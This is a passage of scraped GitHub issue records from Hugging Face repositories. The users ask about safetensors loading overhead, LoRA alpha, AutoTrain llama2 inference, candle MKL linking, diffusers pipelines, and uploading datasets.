100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5/5 [00:21<00:00, 4.37s/it]\r\nload elapsed time: 22.09646322298795\r\nforward elapsed time: 1.4204098680056632\r\n```\r\n\r\n```\r\n$ python flan-t5.py \r\nsafetensors version: 0.3.3\r\nLoading checkpoint shards: 
100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5/5 [00:25<00:00, 5.05s/it]\r\nload elapsed time: 25.486608179984614\r\nforward elapsed time: 1.4887599580106325\r\n```\r\n\r\n```\r\n$ python flan-t5.py \r\nsafetensors version: 0.3.1\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5/5 [00:00<00:00, 35.73it/s]\r\nload elapsed time: 0.37154227000428364\r\nforward elapsed time: 1.1782474629580975\r\n```\r\n\r\n\r\n### Expected behavior\r\n\r\nWe expect that we can alleviate the overhead of swapping data. 
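For instance, if the byte swap currently happens element by element, a single vectorized pass over the whole buffer might already close most of the gap. A rough illustration of the idea with numpy (not the actual safetensors code path):\r\n\r\n```\r\nimport numpy as np\r\n\r\n# little-endian float32 buffer, as stored in a safetensors file\r\nbuf = np.arange(4, dtype=\"<f4\")\r\n# one vectorized pass converts it to the native (big-endian) byte order\r\nnative = buf.astype(buf.dtype.newbyteorder(\"=\"))\r\n```\r\n\r\n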
Either way, the 4x overhead looks too large.", "url": "https://github.com/huggingface/safetensors/issues/333", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-08-20T18:19:44Z", "updated_at": "2023-12-12T01:48:51Z", "comments": 9, "user": "kiszk" }, { "repo": "huggingface/chat-ui", "number": 409, "title": "Deploy Chat UI Spaces Docker template with a PEFT adapter ", "body": "I tried to accomplish this, but the container failed to launch the chat-ui app, as it seems to assume the model would be a non-adapted model.\r\n\r\nIs there a way to make it work?", "url": "https://github.com/huggingface/chat-ui/issues/409", "state": "closed", "labels": [ "bug", "back" ], "created_at": "2023-08-20T05:26:50Z", "updated_at": "2023-09-11T09:37:29Z", "comments": 4, "user": "lrtherond" }, { "repo": "huggingface/datasets", "number": 6163, "title": "Error type: ArrowInvalid Details: Failed to parse string: '[254,254]' as a scalar of type int32", "body": "### Describe the bug\n\nI am getting the following error while trying to upload a CSV sheet to train a model. My CSV sheet's content is exactly the same as shown in the example CSV file on the AutoTrain page. Attaching a screenshot of the error for reference. I have also tried converting the integer answer indices into strings, both with and without inverted commas. \r\nCan anyone please help me out? \r\nFYI: I am using the Chrome browser.\r\n\r\nError type: ArrowInvalid\r\nDetails: Failed to parse string: '[254,254]' as a scalar of type int32\r\n\r\n![Screenshot 2023-08-19 165827](https://github.com/huggingface/datasets/assets/90616801/95fad96e-7dce-4bb5-9f83-9f1659a32891)\r\n\n\n### Steps to reproduce the bug\n\nKindly let me know how to fix this?\n\n### Expected behavior\n\nKindly let me know how to fix this?\n\n### Environment info\n\nKindly let me know how to fix this?", "url": "https://github.com/huggingface/datasets/issues/6163", "state": "open", "labels": [], "created_at": "2023-08-19T11:34:40Z", "updated_at": "2025-07-22T12:04:46Z", "comments": 2, "user": "shishirCTC" }, { "repo": "huggingface/sentence-transformers", "number": 2278, "title": "How to set the no. of epochs for fine-tuning SBERT?", "body": "Hello,\r\nI am fine-tuning a bi-encoder SBERT model on domain-specific data for semantic similarity. There is no loss value posted by the `fit` function from the package. Any idea how to know if the model is overfitting or underfitting the dataset after each epoch? This could help me in deciding the appropriate no. of epochs required for fine-tuning.\r\n\r\nThank you.", "url": "https://github.com/huggingface/sentence-transformers/issues/2278", "state": "open", "labels": [], "created_at": "2023-08-18T18:14:05Z", "updated_at": "2024-01-29T17:00:13Z", "user": "power-puff-gg" }, { "repo": "huggingface/setfit", "number": 409, "title": "model_head.pkl not found on HuggingFace Hub", "body": "I got this message:\r\n\"model_head.pkl not found on HuggingFace Hub, initialising classification head with random weights. 
You should TRAIN this model on a downstream task to use it for predictions and inference.\"\r\n\r\nIs something missing, or is this normal?", "url": "https://github.com/huggingface/setfit/issues/409", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-18T07:52:20Z", "updated_at": "2023-11-24T14:20:51Z", "user": "andysingal" }, { "repo": "huggingface/autotrain-advanced", "number": 216, "title": "How to do inference after training llama2", "body": "I trained a model using this command:\r\n```\r\nautotrain llm --train --project_name 'llama2-indo-testing' \\\r\n --model meta-llama/Llama-2-7b-hf \\\r\n --data_path data/ \\\r\n --text_column text \\\r\n --use_peft \\\r\n --use_int4 \\\r\n --learning_rate 2e-4 \\\r\n --train_batch_size 2 \\\r\n --num_train_epochs 3 \\\r\n --trainer sft \\\r\n --model_max_length 2048 \\\r\n --push_to_hub \\\r\n --repo_id fhadli/llama2-7b-hf-id \\\r\n --block_size 2048 \\\r\n > training.log\r\n```\r\nAfter that, I tried to load the model using this script:\r\n```\r\nfrom transformers import AutoTokenizer\r\nimport transformers\r\nimport torch\r\n\r\nmodel = \"/home/muhammad.fhadli/explorasi/llama2-indo/llama2-indo-testing\"\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(model)\r\npipeline = transformers.pipeline(\r\n \"text-generation\",\r\n model=model,\r\n torch_dtype=torch.float16,\r\n device_map=\"auto\",\r\n)\r\n```\r\n\r\nBut it gave me this error. Can someone please explain why I got it, or what the right way to do inference is?\r\n```\r\nTraceback (most recent call last):\r\n File \"play.py\", line 8, in \r\n pipeline = transformers.pipeline(\r\n File \"/home/muhammad.fhadli/.pyenv/versions/3.8.10/envs/llama/lib/python3.8/site-packages/transformers/pipelines/__init__.py\", line 705, in pipeline\r\n config = AutoConfig.from_pretrained(model, _from_pipeline=task, **hub_kwargs, **model_kwargs)\r\n File \"/home/muhammad.fhadli/.pyenv/versions/3.8.10/envs/llama/lib/python3.8/site-packages/transformers/models/auto/configuration_auto.py\", line 983, in from_pretrained\r\n config_dict, unused_kwargs = PretrainedConfig.get_config_dict(pretrained_model_name_or_path, **kwargs)\r\n File \"/home/muhammad.fhadli/.pyenv/versions/3.8.10/envs/llama/lib/python3.8/site-packages/transformers/configuration_utils.py\", line 617, in get_config_dict\r\n config_dict, kwargs = cls._get_config_dict(pretrained_model_name_or_path, **kwargs)\r\n File \"/home/muhammad.fhadli/.pyenv/versions/3.8.10/envs/llama/lib/python3.8/site-packages/transformers/configuration_utils.py\", line 672, in _get_config_dict\r\n resolved_config_file = cached_file(\r\n File \"/home/muhammad.fhadli/.pyenv/versions/3.8.10/envs/llama/lib/python3.8/site-packages/transformers/utils/hub.py\", line 388, in cached_file\r\n raise EnvironmentError(\r\nOSError: /home/muhammad.fhadli/explorasi/llama2-indo/llama2-indo-testing/ does not appear to have a file named config.json. 
Checkout 'https://huggingface.co//home/muhammad.fhadli/explorasi/llama2-indo/llama2-indo-testing//None' for available files.\r\n```\r\nHere is the content inside my folder:\r\n```\r\n$ls /home/muhammad.fhadli/explorasi/llama2-indo/llama2-indo-testing/\r\nadapter_config.json optimizer.pt rng_state_0.pth scheduler.pt tokenizer_config.json tokenizer.model training_args.bin\r\nadapter_model.bin README.md rng_state_1.pth special_tokens_map.json tokenizer.json trainer_state.json\r\n```", "url": "https://github.com/huggingface/autotrain-advanced/issues/216", "state": "closed", "labels": [], "created_at": "2023-08-18T04:36:37Z", "updated_at": "2023-12-18T15:30:38Z", "user": "muhammadfhadli1453" }, { "repo": "huggingface/diffusers", "number": 4662, "title": "How to call a different scheduler when training a model from repo", "body": "I notice that the settings in train_dreambooth_lora_sdxl.py and the scheduler config from the repo seem to conflict. In the .py the noise scheduler is DDPM, but whenever training starts it seems to still indicate that I am using the repo config scheduler, i.e. EulerDiscreteScheduler. It used to be that you could specify the scheduler config by path, but that seems to have been deprecated at some point.", "url": "https://github.com/huggingface/diffusers/issues/4662", "state": "closed", "labels": [], "created_at": "2023-08-17T21:40:10Z", "updated_at": "2023-08-18T04:18:11Z", "user": "jmaccall316" }, { "repo": "huggingface/transformers", "number": 25576, "title": "How can I make a PR for AutoTokenizer to adapt RWKV world", "body": "### Feature request\r\n\r\nUsually we use our own tokenizer with the transformers pipeline, \r\nlike this: https://github.com/xiaol/Huggingface-RWKV-World/blob/fca236afd5f2815b0dbe6c7ce3c92e51526e2e14/generate_hf_cfg.py#L79C1-L79C1\r\n\r\nSo far we have a lot of models using the new tokenizer, so using the pipeline with AutoTokenizer is critically needed.\r\n\r\nHow can I add a new tokenizer to AutoTokenizer to make this pipeline smooth? \r\n\r\nThank you.\r\n\r\n\r\n### Motivation\r\n\r\n1. Make everyone use RWKV world smoothly; RWKV v5 world is coming.\r\n2. Support the Hugging Face community with these awesome models, and make open source more open.\r\n3. I really don't like that llama models are always at the top of open LLM leaderboards.\r\n4. More...\r\n\r\n### Your contribution\r\n\r\nI made a lot of models based on RWKV 4 world, https://huggingface.co/xiaol , especially 128k context models.", "url": "https://github.com/huggingface/transformers/issues/25576", "state": "closed", "labels": [], "created_at": "2023-08-17T16:36:44Z", "updated_at": "2023-09-25T08:02:43Z", "user": "xiaol" }, { "repo": "huggingface/accelerate", "number": 1854, "title": "How to further accelerate training with 24 cards for 1.3b+ models using accelerate?", "body": "I found that when using DeepSpeed Zero (2 or 3) to train 1.3 billion and larger models (such as llama-7b or gpt-neo-1.3b), the training time for 8 * 32G V100 is almost the same as 24 * 32G V100 (I guess it's because of the additional communication overhead introduced by DeepSpeed). Is there any way to further accelerate training by utilizing 24 cards? 
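One standard mitigation when inter-node communication dominates, sketched here with accelerate's own API (the tiny model and synthetic data are stand-ins, not the setup above): sync gradients less often via gradient accumulation, so the all-reduce only happens at accumulation-window boundaries.

```python
import torch
from torch.utils.data import DataLoader, TensorDataset
from accelerate import Accelerator

accelerator = Accelerator(gradient_accumulation_steps=8)  # fewer syncs per optimizer step

model = torch.nn.Linear(16, 1)                    # stand-in for the real model
optimizer = torch.optim.AdamW(model.parameters())
data = DataLoader(TensorDataset(torch.randn(256, 16), torch.randn(256, 1)), batch_size=8)
model, optimizer, data = accelerator.prepare(model, optimizer, data)

for x, y in data:
    with accelerator.accumulate(model):           # gradients all-reduced only at window boundaries
        loss = torch.nn.functional.mse_loss(model(x), y)
        accelerator.backward(loss)
        optimizer.step()
        optimizer.zero_grad()
```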
Also, Megatron-LM integration is currently limited to GPT-2 and GPT-J, and I'm not sure whether that would help.\r\n\r\n", "url": "https://github.com/huggingface/accelerate/issues/1854", "state": "closed", "labels": [], "created_at": "2023-08-17T15:01:09Z", "updated_at": "2023-09-24T15:05:52Z", "user": "Micheallei" }, { "repo": "huggingface/datasets", "number": 6156, "title": "Why not use self._epoch as seed to shuffle in distributed training with IterableDataset", "body": "### Describe the bug\r\n\r\nCurrently, distributed training with `IterableDataset` needs to pass a fixed seed to shuffle, to keep each node using the same seed and avoid overlapping.\r\nhttps://github.com/huggingface/datasets/blob/a7f8d9019e7cb104eac4106bdc6ec0292f0dc61a/src/datasets/iterable_dataset.py#L1174-L1177\r\n\r\nMy question is: why not directly use `self._epoch`, which is set by `set_epoch`, as the seed? It's almost the same across nodes.\r\nhttps://github.com/huggingface/datasets/blob/a7f8d9019e7cb104eac4106bdc6ec0292f0dc61a/src/datasets/iterable_dataset.py#L1790-L1801\r\n\r\nIf not using `self._epoch` as the shuffling seed, what does this method do to prepare an epoch-seeded generator?\r\nhttps://github.com/huggingface/datasets/blob/a7f8d9019e7cb104eac4106bdc6ec0292f0dc61a/src/datasets/iterable_dataset.py#L1206\r\n\r\n\r\n\r\n### Steps to reproduce the bug\r\n\r\nAs mentioned above.\r\n\r\n### Expected behavior\r\n\r\nAs mentioned above.\r\n\r\n### Environment info\r\n\r\nNot related", "url": "https://github.com/huggingface/datasets/issues/6156", "state": "closed", "labels": [], "created_at": "2023-08-17T10:58:20Z", "updated_at": "2023-08-17T14:33:15Z", "comments": 3, "user": "npuichigo" }, { "repo": "huggingface/diffusers", "number": 4643, "title": "When I load a ControlNet model, where is the inference code?", "body": "I have read the ControlNet code in diffusers/models/controlnet.py,\r\nbut when I load a ControlNet weight, where is the inference code?\r\nThanks", "url": "https://github.com/huggingface/diffusers/issues/4643", "state": "closed", "labels": [], "created_at": "2023-08-17T02:50:59Z", "updated_at": "2023-08-17T04:55:28Z", "user": "henbucuoshanghai" }, { "repo": "huggingface/dataset-viewer", "number": 1689, "title": "Handle breaking change in google dependency?", "body": "See https://huggingface.co/datasets/bigscience/P3/discussions/6#64dca122e3e44e8000c45616\r\n\r\nShould we downgrade the dependency, or fix the datasets?", "url": "https://github.com/huggingface/dataset-viewer/issues/1689", "state": "closed", "labels": [ "question", "dependencies", "P2" ], "created_at": "2023-08-16T14:31:28Z", "updated_at": "2024-02-06T14:59:59Z", "user": "severo" }, { "repo": "huggingface/optimum", "number": 1286, "title": "Support BetterTransformer for the GeneFormer model", "body": "### Feature request\n\nIs it possible to support the GeneFormer model with BetterTransformer?\r\nhttps://huggingface.co/ctheodoris/Geneformer\n\n### Motivation\n\nIt's a new paper with an active community in the Hugging Face repository. The training and inference speed is not fast enough.\n\n### Your contribution\n\nNothing at this time, because I don't want to add it by myself. 
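For context, this is roughly what enabling BetterTransformer looks like once an architecture is supported (a sketch with an already-supported model; GeneFormer itself would first need the support this issue requests):

```python
from transformers import AutoModel
from optimum.bettertransformer import BetterTransformer

model = AutoModel.from_pretrained("bert-base-uncased")  # an already-supported architecture
model = BetterTransformer.transform(model)              # swaps in fused attention kernels
```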
I am requesting this because of this statement from the Hugging Face website:\r\n\r\nLet us know by opening an issue in \ud83e\udd17 Optimum if you want more models to be supported, or check out the [contribution guideline](https://huggingface.co/docs/optimum/bettertransformer/tutorials/contribute) if you want to add it by yourself!", "url": "https://github.com/huggingface/optimum/issues/1286", "state": "closed", "labels": [ "feature-request", "bettertransformer", "Stale" ], "created_at": "2023-08-16T03:32:48Z", "updated_at": "2025-05-07T02:13:16Z", "comments": 1, "user": "seyedmirnezami" }, { "repo": "huggingface/diffusers", "number": 4618, "title": "How to use dreamshaperXL10_alpha2Xl10.safetensors with controlnet-canny-sdxl-1.0 ?", "body": "I want to use dreamshaperXL10_alpha2Xl10.safetensors with controlnet-canny-sdxl-1.0.\r\nI downloaded the dreamshaperXL10_alpha2Xl10.safetensors file and tried to use:\r\n\r\npipe = StableDiffusionXLControlNetPipeline.from_pretrained(\r\n'./dreamshaperXL10_alpha2Xl10.safetensors',\r\ncontrolnet=controlnet,\r\nuse_safetensors=True,\r\ntorch_dtype=torch.float16,\r\nvariant=\"fp16\"\r\n)\r\n\r\nGot this error:\r\npipe = StableDiffusionXLControlNetPipeline.from_pretrained(\r\nFile \"/opt/conda/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 908, in from_pretrained\r\ncached_folder = cls.download(\r\nFile \"/opt/conda/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 1330, in download\r\ninfo = model_info(\r\nFile \"/opt/conda/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 110, in _inner_fn\r\nvalidate_repo_id(arg_value)\r\nFile \"/opt/conda/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 158, in validate_repo_id\r\nraise HFValidationError(\r\nhuggingface_hub.utils._validators.HFValidationError: Repo id must be in the form 'repo_name' or 'namespace/repo_name': './dream/dreamshaperXL10_alpha2Xl10.safetensors'. Use repo_type argument if needed.\r\n\r\n\r\nPreviously, I tried to use from_single_file instead of from_pretrained.\r\nGot this error: from_single_file not available with StableDiffusionXLControlNetPipeline.\r\n\r\nPlease help.\r\nThanks", "url": "https://github.com/huggingface/diffusers/issues/4618", "state": "closed", "labels": [], "created_at": "2023-08-15T13:44:54Z", "updated_at": "2023-08-22T01:31:37Z", "user": "arnold408" }, { "repo": "huggingface/peft", "number": 826, "title": "What is alpha? Alpha is not in the paper.", "body": "### Feature request\n\nhttps://github.com/huggingface/peft/blob/main/src/peft/tuners/lora.py#L57\r\nThis alpha is not in the paper:\r\nhttps://arxiv.org/abs/2106.09685\r\n\r\nWhere can I learn about this alpha?\r\n\r\nThank you!\n\n### Motivation\n\nAs titled.\n\n### Your contribution\n\nAs titled.", "url": "https://github.com/huggingface/peft/issues/826", "state": "closed", "labels": [], "created_at": "2023-08-15T09:47:58Z", "updated_at": "2023-09-23T15:03:19Z", "user": "XuJianzhi" }, { "repo": "huggingface/optimum", "number": 1285, "title": "Merge patch into autogptq", "body": "### Feature request\n\nCurrently, there is a patch to get GPTQ quantization working:\r\n```\r\n# !pip install -q git+https://github.com/fxmarty/AutoGPTQ.git@patch-act-order-exllama\r\n```\r\n\r\nIs there a plan to try and merge that into the autogptq repo?\n\n### Motivation\n\nautogptq is slow to install. This is easily solved by using wheels, but I don't have wheels for this patch. 
Easiest would be for the patch to be released.\n\n### Your contribution\n\nSeems like the patch is a few tens of commits behind autogptq, so the first step would be to check whether doing a pr would create conflicts.", "url": "https://github.com/huggingface/optimum/issues/1285", "state": "closed", "labels": [], "created_at": "2023-08-14T16:24:14Z", "updated_at": "2023-08-23T17:17:46Z", "comments": 5, "user": "RonanKMcGovern" }, { "repo": "huggingface/candle", "number": 443, "title": "What is the minimal requirements of Intel MKL version?", "body": "Hello, Thanks for the great work!\r\n\r\nI've got an error while compiling with the `-features mkl` option. \r\nFor example `cargo install --git https://github.com/huggingface/candle.git candle-examples --examples bert -F mkl`\r\n\r\nThe error said\r\n```bash\r\n = note: /usr/bin/ld: /workspaces/Kuberian/searcher/target/debug/deps/libcandle_core-0afc8671b4dae8af.rlib(candle_core-0afc8671b4dae8af.candle_core.b11884625c01537d-cgu.13.rcgu.o): in function `candle_core::mkl::hgemm':\r\n /usr/local/cargo/git/checkouts/candle-0c2b4fa9e5801351/60cd155/candle-core/src/mkl.rs:162: undefined reference to `hgemm_'\r\n collect2: error: ld returned 1 exit status\r\n \r\n = note: some `extern` functions couldn't be found; some native libraries may need to be installed or have their path specified\r\n = note: use the `-l` flag to specify native libraries to link\r\n = note: use the `cargo:rustc-link-lib` directive to specify the native libraries to link with Cargo (see https://doc.rust-lang.org/cargo/reference/build-scripts.html#cargorustc-link-libkindname)\r\n```\r\n\r\nI initially thought that I did not install intel mkl libs properly, but I found that \r\n1. [intel-mkl-src](https://github.com/rust-math/intel-mkl-src) automatically downloads the required library from ghcr\r\n2. `intel mkl 2020.01`, which automatically downloaded from [here](https://github.com/rust-math/rust-mkl-container), simply does not implement `hgemm` while they do implement `sgemm` and `dgemm`\r\n3. the latest version of intel mkl does implement `hgemm`\r\n\r\nSo I tried the latest version of intel mkl, but it seems `intel-mkl-src` does not support it.\r\n\r\nI'm wondering which `intel-mkl` version do you use for your development environment?\r\n", "url": "https://github.com/huggingface/candle/issues/443", "state": "closed", "labels": [], "created_at": "2023-08-14T14:09:01Z", "updated_at": "2024-02-03T16:43:34Z", "user": "iwanhae" }, { "repo": "huggingface/pytorch-image-models", "number": 1917, "title": "how to change SqueezeExcite in efficientnet", "body": "I want to create efficientnet networks using timm, where SqueezeExcite contains three parts ['Conv2d','SiLU','Conv2d'], but it contains four parts ['Conv2d','SiLU','Conv2d','sigmoid'], How should I modify it, thank you\r\n", "url": "https://github.com/huggingface/pytorch-image-models/issues/1917", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-08-14T11:45:05Z", "updated_at": "2023-08-14T14:13:26Z", "user": "Yang-Changhui" }, { "repo": "huggingface/setfit", "number": 408, "title": "No tutorial or guideline for Few-shot learning on multiclass text classification", "body": "I just want to use SBERT for Few Shot multiclass text classification, however I couldn't see any tutorial or explanation for it. 
Can you explain to me that which \"multi_target_strategy\" and loss function should I use for multi-class text classification ?", "url": "https://github.com/huggingface/setfit/issues/408", "state": "open", "labels": [ "documentation", "question" ], "created_at": "2023-08-14T09:02:18Z", "updated_at": "2023-10-03T20:29:25Z", "user": "ByUnal" }, { "repo": "huggingface/diffusers", "number": 4594, "title": "latents.requires_grad is false in my custom pipeline no matter what.", "body": "Hi, in my quest to make a flexible pipeline that can easily add new features instead of creating a pipeline for every variation, I made the following:\r\n\r\n```\r\nclass StableDiffusionRubberPipeline(StableDiffusionPipeline):\r\n call_funcs=[]\r\n def __init__(\r\n self,\r\n vae: AutoencoderKL,\r\n text_encoder: CLIPTextModel,\r\n tokenizer: CLIPTokenizer,\r\n unet: UNet2DConditionModel,\r\n scheduler: KarrasDiffusionSchedulers,\r\n safety_checker: StableDiffusionSafetyChecker,\r\n feature_extractor: CLIPImageProcessor,\r\n requires_safety_checker: bool = True,\r\n ):\r\n self.before_init()\r\n super().__init__(vae,text_encoder,tokenizer,unet,scheduler,safety_checker,feature_extractor,requires_safety_checker)\r\n\r\n if hasattr(scheduler.config, \"steps_offset\") and scheduler.config.steps_offset != 1:\r\n deprecation_message = (\r\n f\"The configuration file of this scheduler: {scheduler} is outdated. `steps_offset`\"\r\n f\" should be set to 1 instead of {scheduler.config.steps_offset}. Please make sure \"\r\n \"to update the config accordingly as leaving `steps_offset` might led to incorrect results\"\r\n \" in future versions. If you have downloaded this checkpoint from the Hugging Face Hub,\"\r\n \" it would be very nice if you could open a Pull request for the `scheduler/scheduler_config.json`\"\r\n \" file\"\r\n )\r\n deprecate(\"steps_offset!=1\", \"1.0.0\", deprecation_message, standard_warn=False)\r\n new_config = dict(scheduler.config)\r\n new_config[\"steps_offset\"] = 1\r\n scheduler._internal_dict = FrozenDict(new_config)\r\n\r\n if hasattr(scheduler.config, \"clip_sample\") and scheduler.config.clip_sample is True:\r\n deprecation_message = (\r\n f\"The configuration file of this scheduler: {scheduler} has not set the configuration `clip_sample`.\"\r\n \" `clip_sample` should be set to False in the configuration file. Please make sure to update the\"\r\n \" config accordingly as not setting `clip_sample` in the config might lead to incorrect results in\"\r\n \" future versions. If you have downloaded this checkpoint from the Hugging Face Hub, it would be very\"\r\n \" nice if you could open a Pull request for the `scheduler/scheduler_config.json` file\"\r\n )\r\n deprecate(\"clip_sample not set\", \"1.0.0\", deprecation_message, standard_warn=False)\r\n new_config = dict(scheduler.config)\r\n new_config[\"clip_sample\"] = False\r\n scheduler._internal_dict = FrozenDict(new_config)\r\n\r\n if safety_checker is None and requires_safety_checker:\r\n logger.warning(\r\n f\"You have disabled the safety checker for {self.__class__} by passing `safety_checker=None`. Ensure\"\r\n \" that you abide to the conditions of the Stable Diffusion license and do not expose unfiltered\"\r\n \" results in services or applications open to the public. Both the diffusers team and Hugging Face\"\r\n \" strongly recommend to keep the safety filter enabled in all public facing circumstances, disabling\"\r\n \" it only for use-cases that involve analyzing network behavior or auditing its results. 
For more\"\r\n \" information, please have a look at https://github.com/huggingface/diffusers/pull/254 .\"\r\n )\r\n\r\n if safety_checker is not None and feature_extractor is None:\r\n raise ValueError(\r\n \"Make sure to define a feature extractor when loading {self.__class__} if you want to use the safety\"\r\n \" checker. If you do not want to use the safety checker, you can pass `'safety_checker=None'` instead.\"\r\n )\r\n\r\n is_unet_version_less_0_9_0 = hasattr(unet.config, \"_diffusers_version\") and version.parse(\r\n version.parse(unet.config._diffusers_version).base_version\r\n ) < version.parse(\"0.9.0.dev0\")\r\n is_unet_sample_size_less_64 = hasattr(unet.config, \"sample_size\") and unet.config.sample_size < 64\r\n if is_unet_version_less_0_9_0 and is_unet_sample_size_less_64:\r\n deprecation_message = (\r\n \"The configuration file of the unet has set the default `sample_size` to smaller than\"\r\n \" 64 which seems highly unlikely. If your checkpoint is a fine-tuned version of any of the\"\r\n \" following: \\n- CompVis/stable-diffusion-v1-4 \\n- CompVis/stable-diffusion-v1-3 \\n-\"\r\n \" CompVis/stable-diffusion-v1-2 \\n- CompVis/stable-diffusion-v1-1 \\n- runwayml/stable-diffusion-v1-5\"\r\n \" \\n- runwayml/stable-diffusion-inpainting \\n you should change 'sample_size' to 64 in the\"\r\n \" configuration file. Please make sure to update the config accordingly as leaving `sample_size=32`\"\r\n \" in the config mi", "url": "https://github.com/huggingface/diffusers/issues/4594", "state": "closed", "labels": [], "created_at": "2023-08-13T15:02:22Z", "updated_at": "2023-08-14T12:11:36Z", "user": "alexblattner" }, { "repo": "huggingface/datasets", "number": 6153, "title": "custom load dataset to hub", "body": "### System Info\n\nkaggle notebook\r\n\r\ni transformed dataset:\r\n```\r\ndataset = load_dataset(\"Dahoas/first-instruct-human-assistant-prompt\")\r\n```\r\nto \r\nformatted_dataset: \r\n```\r\nDataset({\r\n features: ['message_tree_id', 'message_tree_text'],\r\n num_rows: 33143\r\n})\r\n```\r\nbut would like to know how to upload to hub\n\n### Who can help?\n\n@ArthurZucker @younesbelkada\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nshared above\n\n### Expected behavior\n\nload dataset to hub", "url": "https://github.com/huggingface/datasets/issues/6153", "state": "closed", "labels": [], "created_at": 